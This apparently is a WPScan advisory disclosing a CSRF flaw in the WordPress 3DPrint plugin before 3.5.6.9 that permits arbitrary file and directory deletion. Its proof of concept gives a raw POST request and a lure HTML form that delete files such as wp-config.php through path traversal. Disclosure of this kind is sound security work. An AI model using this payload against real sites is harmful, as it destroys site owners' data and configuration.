WordPress Plugin Vulnerabilities
3DPrint < 3.5.6.9 - Arbitrary File and Directory Deletion via CSRF
Description
The plugin does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will delete any number of files or directories on the target server by tricking a logged in admin into submitting a form.
Proof of Concept
== RAW POST Request==
POST /wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php HTTP/1.1
Host: example.com
Cookie: [admin+]
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
group=1&delete=1&file%5b0%5d=../2022&file%5b1%5d=../../../wp-config.php
== HTML form ==
<form action="https://example.com//wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php" method="POST">
<input type="hidden" name="group" value="1">
<input type="hidden" name="delete" value="1">
<input type="hidden" name="file[1]" value="../2020">
<input type="hidden" name="file[2]" value="../../../wp-config.php">
<input type="submit" value="Get rich!">
</form>
== Notes ==
The value of 'group' and 'delete' can be anything, they are never used.
The file path of the files and dirs to delete is relative to the plugin upload root, 'wp-content/uploads/p3d'. Directories are deleted recursively.
Affects Plugins
Fixed in 3.5.6.9 References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScan team
Submitter
Harald Eilertsen
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-11-08 (about 1 years ago)
Added
2022-11-08 (about 1 years ago)
Last Updated
2023-06-20 (about 10 months ago)
WPScan 